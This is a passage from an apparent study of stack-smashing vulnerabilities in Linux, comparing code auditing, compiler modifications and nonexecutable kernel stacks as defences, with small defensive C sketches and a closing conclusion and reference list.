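Checking command line arguments and environment variables for excessive length can be sketched as follows. The function names length_ok and inputs_ok, and the idea of a single length limit for all inputs, are assumptions made for illustration; a real program would choose limits per input.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* True if s is non-NULL and shorter than max_len characters. The scan
 * stops after max_len bytes, so an oversized string is rejected without
 * being read in full. */
bool length_ok(const char *s, size_t max_len)
{
    if (s == NULL)
        return false;
    return memchr(s, '\0', max_len) != NULL;
}

/* Checks every command line argument and one named environment variable. */
bool inputs_ok(int argc, char *const argv[], const char *env_name, size_t max_len)
{
    assert(argv != NULL && env_name != NULL);

    for (int i = 0; i < argc; i++)
        if (!length_ok(argv[i], max_len))
            return false;

    const char *val = getenv(env_name);
    /* an unset variable is acceptable; a set one must pass the length check */
    return val == NULL || length_ok(val, max_len);
}
```

A privileged program could call inputs_ok() at the top of main() and exit before any copying takes place if the check fails.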
In summary, automated debugging tools are useful in correcting known vulnerabilities; however, they cannot detect future vulnerabilities and are limited as security tools. Security and stability go hand in hand. Programs that use secure functions and accept less bad input data are not only more secure, but also run more efficiently and build faster. By changing existing code and writing new code with security in mind, both privileged and nonprivileged code share the benefits. Recalling the ease with which privileged program execution can be transferred, it is important to note that privileged code often trusts nonprivileged code. Privileged processes may assume that all binaries, privileged and nonprivileged, are to be trusted. By using more secure programming practices on all Linux system code, every segment of the code base is strengthened. Security and robustness both involve thinking about the ranges of allowable inputs and responses, and limiting them so that undesirable responses are not produced.

Modifying the code is the only near-foolproof method of ensuring that SUID root programs are not exploited. Not only can this avoid buffer overflows in programs, but it also produces faster, more efficient, and more robust code in the nonsecurity areas of the operating system. The OpenBSD project has paid special attention to this. The disadvantage of manually modifying all affected programs is obvious: all subject programs must be checked by hand and recompiled. Thousands of lines of source code must have all function calls and UID execution privileges examined and changed if necessary.

In the free operating system arena, systems such as Linux, FreeBSD, OpenBSD and NetBSD have full source code distributions available for public use. Complete copies of the operating system kernel and system utilities may be downloaded and modified, allowing anyone to fix stack smashing vulnerabilities. In contrast, commercial operating systems have limited, if any, source code availability. As the chief decentralized approach to avoiding stack smashing holes in the Linux operating system, global code auditing is the most expensive in terms of necessary manpower and workload, but can offer the most in long-term reliability and security.

Compiler modifications
An additional decentralized approach to preventing stack smashing vulnerabilities is to modify how the C compiler of a given Linux operating system treats vulnerable functions. However, it is important to note that, in most cases, such modifications are not trivial and involve fundamental changes to the concepts behind the C programming language.

A simple approach of this nature involves modifications to the C compiler that do not affect the C programming language. For example, the BSDI and OpenBSD operating systems’ compilers generate warning messages when compiling a program which uses “dangerous” function calls. Although a warning by itself fixes nothing, the main benefit of such an approach is that it encourages secure programming without changing the code or its performance.

A median approach involves slight modifications that affect only the “dangerous” functions in the C library, which then perform a stack integrity check before referencing the appropriate return value. In one proposed patch to the FreeBSD operating system, a failed integrity check would simply print a warning message and exit the affected program. The main disadvantage of this approach is that all dangerous functions would suffer a significant performance penalty and, like the previous approach, it does not take into account autonomous functions defined by the programmer, because it is implemented in the system libraries. An additional drawback is that the code necessary for checking the stack must be written in assembler, and is thus not portable to multiple architectures.

An extreme approach to solving the problem with the compiler involves implementing bounds checking in the C programming language.
This is possibly the most dangerous solution to the stack smashing problem, as it violates the C programming language’s simplicity, efficiency, and flexibility. One approach used in implementing it involves modifying the representation of pointers in the language to include three items: the pointer itself, and the lower and upper bounds of the pointer’s address space. By giving the compiler the additional upper and lower bound information, it would then be trivial to do bounds checking before byte copy functions. Despite this benefit, implementing bounds checking in this way has the following disadvantages: execution time of the resulting code increases by a factor of ten or more[5], register allocation becomes more expensive by a factor of three, new versions of all compiled system libraries and system calls must be provided, and code that interfaces with the hardware directly may be completely incompatible or require special attention.

A different approach performs the same type of bounds checking without modifying the representation of pointers, and offers options to turn the bounds checking mode on or off in a given program. Only one base pointer is valid for a given storage region, so one can check whether a pointer arithmetic expression is valid by finding its base pointer’s storage region, and then checking again to ensure that the expression’s result points to the same storage region. Despite semi-favorable performance statistics, and in addition to the general risk involved in modifying the C language at this level, this modification involves patching and recompiling the existing C compiler and its libraries. Furthermore, all previously compiled binaries must be deleted and recompiled with the new libraries. Once this is done, all binaries on the system will execute with respect to this patch.

In conclusion, modifying the C language or the C compiler to limit stack smashing opportunities often involves modifying the C language at a nontrivial level. Additionally, the most complex and comprehensive solutions of this nature, despite their long-term centralization, still remain largely decentralized and difficult to implement and test in a reasonable amount of time. The more trivial modifications of this nature degenerate simply into compiler warning messages that can only encourage the programmer to modify the program manually.
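The three-item pointer representation mentioned in this section can be imitated by hand in ordinary C, which gives a feel for what such a compiler would have to generate for every pointer. This is a minimal sketch only; the names bounded_ptr, bp_make and bp_copy are hypothetical and do not come from any of the compilers or patches discussed.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical "bounded pointer": the pointer itself plus the lower and
 * upper bounds of the object it may address (upper is one past the end). */
struct bounded_ptr {
    char *ptr;
    char *lower;
    char *upper;
};

/* Wraps a buffer of `size` bytes starting at `base`. */
struct bounded_ptr bp_make(char *base, size_t size)
{
    assert(base != NULL);
    struct bounded_ptr bp = { base, base, base + size };
    return bp;
}

/* Bounds-checked byte copy: refuses any write that would leave the
 * region [lower, upper). Returns true if the copy was performed. */
bool bp_copy(struct bounded_ptr dst, const char *src, size_t n)
{
    assert(src != NULL);
    if (dst.ptr < dst.lower || dst.ptr > dst.upper)
        return false;
    if (n > (size_t)(dst.upper - dst.ptr))
        return false;
    memcpy(dst.ptr, src, n);
    return true;
}
```

Every pointer now occupies three machine words and every copy carries extra comparisons, which hints at where the performance and register allocation costs listed above come from.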

CPU/OS kernel stack execution privilege
The most centralized approach to preventing some stack smashing vulnerabilities involves modifying the segment limit set by the operating system’s kernel such that it does not cover the actual stack space. This approach effectively removes stack execution permission, and it has a fundamental advantage over other countermeasures: as the most centralized method of limiting stack smashing vulnerabilities, it requires no recompilation of the C libraries or the compiler. Only the operating system kernel needs to be recompiled. A practical implementation of this concept on the Linux operating system is described below, touching on the details of implementation as well as some of the problems.

To remove stack execution privilege in Linux, the stack that the operating system allocates dynamically for a process is marked as nonexecutable. Any program started under such a kernel would have its stack pages marked nonexecutable as well. Stack smashing exploits depend on an executable stack when returning into a memory address which executes an interactive shell. By removing this functionality from the system, some stack smashing vulnerabilities can be stopped. However, signal handler returns in the Linux operating system require an executable stack. Signal handlers are absolutely crucial in an operating system, so a temporarily executable stack for signal handlers must be implemented. Buffer overflows in signal handlers would therefore still be possible using this temporarily executable stack.

Changing the kernel stack execution permissions would stop most SUID buffer overflows, excluding those involving signal handlers. A system with a nonexecutable stack also hinders LISP and Objective C development efforts, and other functional languages might be affected as well. Furthermore, every program already contains code that performs fundamental operations, such as saving and restoring values from CPU registers and performing system calls. In contrast to the stack smashing exploits formulated so far, an attack that reuses such existing code would be impossible to prevent by changing the stack execution privilege. In other words, removing the stack execution permission only prevents today’s stack smashing exploits from working properly. As exploits become more sophisticated, stack execution bits may have little or no relevance to the exploit.

As an aside, this type of patch can also be implemented in system CPU hardware. New system architectures could simply have multiple stacks: one for call frames, and one for automatic storage.

In conclusion, by removing stack execution from the system kernel, one can attempt to stop the stack smashing problem at the source. However, this approach suffers in implementation because the necessary code is nonportable, and because standard compiler functions and operating system signal handling behavior are modified and may be unpredictable. In addition, this approach is not proven to stop more sophisticated stack smashing exploits.
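Whether a process actually runs with a nonexecutable stack can be inspected on Linux systems that provide /proc/<pid>/maps, where each mapping is listed with a four-character permission field. The sketch below is not part of the kernel patch described in this section; the function name stack_line_is_executable is hypothetical and the sample line in the comment is illustrative.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Examines one line in the format of Linux's /proc/<pid>/maps, e.g.
 *   7ffd1c3e0000-7ffd1c401000 rw-p 00000000 00:00 0    [stack]
 * Returns true only if the line describes the stack mapping and its
 * permission field contains 'x'. */
bool stack_line_is_executable(const char *line)
{
    assert(line != NULL);

    if (strstr(line, "[stack]") == NULL)
        return false;

    const char *perms = strchr(line, ' ');   /* permissions follow the address range */
    if (perms == NULL)
        return false;
    perms++;

    /* the field is four characters: r/-, w/-, x/-, p/s */
    return strlen(perms) >= 4 && perms[2] == 'x';
}
```

A small program could read /proc/self/maps line by line with fgets() and pass each line to this function to report the state of its own stack.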



Chapter 6. Conclusion
Stack smashing security exploits have become commonplace on Linux machines as a means to gain access to privileged resources. Based on this study, one can see how an unprivileged user can obtain privileged user permissions by combining standard operations and conditions of Linux and the C programming language. Furthermore, given the number of privileged programs that exist in today’s standard Linux distributions, an overflow exploit could be constructed for any number of these systems.

In spite of the prevalence of stack smashing, a number of things can be done to prevent most stack smashing vulnerabilities. As the level of awareness of stack smashing exploits increases, Linux vendors, programmers, system administrators and users alike are educating each other. System administrators can implement various configuration methods to lower the possibility of stack smashing vulnerabilities being exploited. Linux vendors can do their part by making a commitment to be very cautious with the privileged binaries installed by default on their specific Linux distribution. Lastly, perhaps the most effective solution can come from programmers who write privileged code. As standards evolve and are accepted for coding safer privileged programs and creating more secure operating systems, programmers can develop more robust code which is less susceptible to stack smashing. With the cooperation of many people in different parts of the Linux community, stack smashing security vulnerabilities can be defeated.



Appendix A. References
• PC Assembly Book by Paul A. Carter
• Smashing the Stack for Fun and Profit by Aleph One, Phrack Magazine
• Microprocessors and Interfacing: Programming and Hardware by Douglas V. Hall

